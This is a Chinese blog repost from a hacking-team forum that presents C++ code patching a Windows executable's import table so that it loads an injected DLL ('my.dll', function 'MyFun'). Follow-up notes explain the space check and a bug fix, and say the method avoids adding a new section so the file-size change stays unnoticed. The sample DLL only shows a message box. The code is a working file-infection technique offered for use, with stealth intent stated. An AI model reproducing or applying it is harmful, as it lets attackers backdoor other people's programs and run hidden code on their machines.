Chinaunix首页 | 论坛 | 博客
  • 博客访问: 660481
  • 博文数量: 151
  • 博客积分: 3498
  • 博客等级: 中校
  • 技术积分: 1570
  • 用 户 组: 普通用户
  • 注册时间: 2005-02-28 18:10
文章分类

全部博文(151)

文章存档

2014年(12)

2013年(17)

2012年(17)

2011年(5)

2010年(12)

2009年(2)

2007年(26)

2006年(22)

2005年(38)

分类: WINDOWS

2012-03-21 22:25:09

[原创]发一段感染引入表的vc代码 信息来源:邪恶八进制信息安全团队()
文章作者:[E.S.T] 认真的雪

点击(此处)折叠或打开

  1. #include <stdio.h>
  2. #include <windows.h>

  3. DWORD RVAToOffset(LPVOID lpBase,DWORD VirtualAddress)
  4. {
  5.         IMAGE_DOS_HEADER *dosHeader;
  6.         IMAGE_NT_HEADERS *ntHeader;
  7.         IMAGE_SECTION_HEADER *sectionHeader;
  8.         int NumOfSections;
  9.         dosHeader=(IMAGE_DOS_HEADER*)lpBase;
  10.         ntHeader=(IMAGE_NT_HEADERS*)((BYTE*)lpBase+dosHeader->e_lfanew);
  11.         NumOfSections=ntHeader->FileHeader.NumberOfSections;
  12.         for (int i=0;i<NumOfSections;i++)
  13.         {
  14.                 sectionHeader=(IMAGE_SECTION_HEADER*)((BYTE*)lpBase+dosHeader->e_lfanew+sizeof(IMAGE_NT_HEADERS))+i;
  15.                 if(VirtualAddress>sectionHeader->VirtualAddress&&VirtualAddress<sectionHeader->VirtualAddress+sectionHeader->SizeOfRawData)
  16.                 {
  17.                         DWORD AposRAV=VirtualAddress-sectionHeader->VirtualAddress;
  18.                         DWORD Offset=sectionHeader->PointerToRawData+AposRAV;
  19.                         return Offset;
  20.                 }
  21.         }
  22.         return 0;
  23. }

  24. int sectionNum(LPVOID lpBase,DWORD VirtualAddress)
  25. {
  26.         IMAGE_DOS_HEADER *dosHeader;
  27.         IMAGE_NT_HEADERS *ntHeader;
  28.         IMAGE_SECTION_HEADER *sectionHeader;
  29.         int NumOfSections;
  30.         dosHeader=(IMAGE_DOS_HEADER*)lpBase;
  31.         ntHeader=(IMAGE_NT_HEADERS*)((BYTE*)lpBase+dosHeader->e_lfanew);
  32.         NumOfSections=ntHeader->FileHeader.NumberOfSections;
  33.         for (int i=0;i<NumOfSections;i++)
  34.         {
  35.                 sectionHeader=(IMAGE_SECTION_HEADER*)((BYTE*)lpBase+dosHeader->e_lfanew+sizeof(IMAGE_NT_HEADERS))+i;
  36.                 if(VirtualAddress>sectionHeader->VirtualAddress&&VirtualAddress<sectionHeader->VirtualAddress+sectionHeader->SizeOfRawData)
  37.                 {

  38.                         return i;
  39.                 }
  40.         }
  41.         return -1;
  42. }


  43. int main(int argc, char* argv[])
  44. {

  45.         HANDLE hFile=CreateFile(argv[1],GENERIC_READ|GENERIC_WRITE,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
  46.         if(hFile==INVALID_HANDLE_VALUE)
  47.         {
  48.                 printf("CreateFile Failed\n");
  49.                 return 0;
  50.         }

  51.         HANDLE hMap=CreateFileMapping(hFile,NULL,PAGE_READWRITE,NULL,NULL,NULL);
  52.         if(hMap==INVALID_HANDLE_VALUE)
  53.         {
  54.                 printf("CreateFileMapping Failed\n");
  55.                 return 0;
  56.         }

  57.         LPVOID lpBase=MapViewOfFile(hMap,FILE_MAP_WRITE,0,0,0);
  58.         if(lpBase==NULL)
  59.         {
  60.                 printf("MapViewOfFile Failed\n");
  61.                 return 0;
  62.         }
  63.         IMAGE_DOS_HEADER *dosHeader;
  64.         IMAGE_NT_HEADERS *ntHeader;
  65.         dosHeader=(IMAGE_DOS_HEADER*)lpBase;

  66.         if (dosHeader->e_magic!=IMAGE_DOS_SIGNATURE)
  67.         {
  68.                 printf("This is not a windows file\n");
  69.                 return 0;
  70.         }
  71.        
  72.         ntHeader=(IMAGE_NT_HEADERS*)((BYTE*)lpBase+dosHeader->e_lfanew);
  73.         if(ntHeader->Signature!=IMAGE_NT_SIGNATURE)
  74.         {
  75.                 printf("This is not a win32 file\n");
  76.                 return 0;
  77.         }
  78.         int numOfSections=ntHeader->FileHeader.NumberOfSections;
  79.        
  80.         int ncout=sectionNum(lpBase,ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);
  81.         if(ncout==-1)
  82.         {
  83.                 printf("get section failed\n");
  84.                 return 0;
  85.         }
  86.         IMAGE_SECTION_HEADER *sectionHeader;
  87.         sectionHeader=(IMAGE_SECTION_HEADER*)((BYTE*)lpBase+dosHeader->e_lfanew+sizeof(IMAGE_NT_HEADERS))+ncout;
  88.         int nullsize=sectionHeader->SizeOfRawData-sectionHeader->Misc.VirtualSize;
  89.         printf("%d\n",nullsize);
  90.         IMAGE_IMPORT_DESCRIPTOR *ImportDec=(IMAGE_IMPORT_DESCRIPTOR*)((BYTE*)lpBase+RVAToOffset(lpBase,ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress));
  91.         int i=0;
  92.         while(ImportDec->FirstThunk)
  93.         {
  94.                 i++;
  95.                 ImportDec++;
  96.         }
  97.         if(i*20+20*3+8+8>nullsize)
  98.         {
  99.                 printf("file space is not enough\n");
  100.                 return 0;
  101.         }
  102.         IMAGE_IMPORT_DESCRIPTOR *newImport;
  103.         newImport=(IMAGE_IMPORT_DESCRIPTOR *)((BYTE*)lpBase+sectionHeader->PointerToRawData+sectionHeader->Misc.VirtualSize);
  104.         printf("%x\n",sectionHeader->PointerToRawData+sectionHeader->Misc.VirtualSize);
  105.         printf("%d\n",sizeof(IMAGE_IMPORT_DESCRIPTOR));
  106.         ImportDec=(IMAGE_IMPORT_DESCRIPTOR*)((BYTE*)lpBase+RVAToOffset(lpBase,ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress));
  107.         i=0;
  108.         while(ImportDec->FirstThunk)
  109.         {
  110.                 *newImport=*ImportDec;
  111.                 i++;
  112.                 ImportDec++;
  113.                 newImport++;
  114.         }
  115.         IMAGE_IMPORT_DESCRIPTOR myImport;
  116.         char *name="my.dll";
  117.         myImport.FirstThunk=(DWORD)(sectionHeader->Misc.VirtualSize+sectionHeader->VirtualAddress+sizeof(IMAGE_IMPORT_DESCRIPTOR)*(i+2)+20);
  118.         myImport.TimeDateStamp=0;
  119.         myImport.ForwarderChain=0;
  120.         myImport.OriginalFirstThunk=(DWORD)(sectionHeader->Misc.VirtualSize+sectionHeader->PointerToRawData+sizeof(IMAGE_IMPORT_DESCRIPTOR)*(i+2)+20);
  121.         myImport.Name=(DWORD)(sectionHeader->Misc.VirtualSize+sectionHeader->VirtualAddress+sizeof(IMAGE_IMPORT_DESCRIPTOR)*(i+2));
  122.         *newImport=myImport;
  123.         newImport++;
  124.         memset(newImport,0,sizeof(IMAGE_IMPORT_DESCRIPTOR));
  125.         newImport++;
  126.         memcpy((char*)newImport,name,strlen(name)+1);
  127.         DWORD newThunk;
  128.         newThunk=(DWORD)newImport+20;
  129.         *(DWORD*)newThunk=(DWORD)(sectionHeader->Misc.VirtualSize+sectionHeader->VirtualAddress+sizeof(IMAGE_IMPORT_DESCRIPTOR)*(i+2)+20+8);
  130.         memset((void*)(newThunk+4),0,4);
  131.         newThunk=newThunk+8;
  132.         WORD hint=0x00;
  133.         *(WORD*)newThunk=hint;
  134.         newThunk=newThunk+sizeof(WORD);
  135.         char *funname="MyFun";
  136.         memcpy((char*)newThunk,funname,strlen(funname)+2);
  137.         ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress=sectionHeader->Misc.VirtualSize+sectionHeader->VirtualAddress;
  138.         FlushViewOfFile(lpBase,0);
  139.         UnmapViewOfFile(lpBase);
  140.         CloseHandle(hMap);
  141.         CloseHandle(hFile);
  142.         return 0;
  143. }



以下是对该代码的一些讨论:
1.  不是在现有引入表结构之后添加一个新的引入表结构滴,而是把原先的的引入表写到引入表所在节的空余空间上,再加上新的引入表结构,一般来说这个长度是足够的,不是前面还做了长度大小的判断吗....加一个新节文件大小改变了,会比较明显哟,所以当时就这么写了....貌似代码是比较乱,见谅了,嘿 嘿.....

2.  if(i*20+20*3+8+8>nullsize)   意思是:判断导入表所在节的末尾的剩余空间,是否足够写入所有的导入表。

3. i*20是原始导入表的大小。。。
那么后面的20*3+8+8就是my.dll所对应的IMAGE_IMPORT_DESCRIPTOR结构和这个结构中的成员所指向的数据的大小。。。。


4. 发现这段代码还是有问题,把sectionHeader->PointerToRawData改成sectionHeader->Misc.VirtualSize就行了...

5. 导出函数MyFun是否正确,使用PE查看工具或者Dependecy工具
    确认不是"_MyFun@所有参数的字节数 "  的导出形式。
   对于用VC制造的DLL,  最好对函数作如下声明:
  ------>.h
 #ifdef MYDLL
#define DLLFUN   _declspec(dllexport)
#else
#define DLLFUN   _declspec(dllimport)
#endif

#ifdef __cplusplus
extern "C" {
#endif

DLLFUN  void MyFun();

#ifdef __cplusplus
}
#endif

  ------>.cpp
DLLFUN  void MyFun()
{
    MessageBox(NULL,"just to do it , my boy","hahahah",MB_OK);
}
阅读(792) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~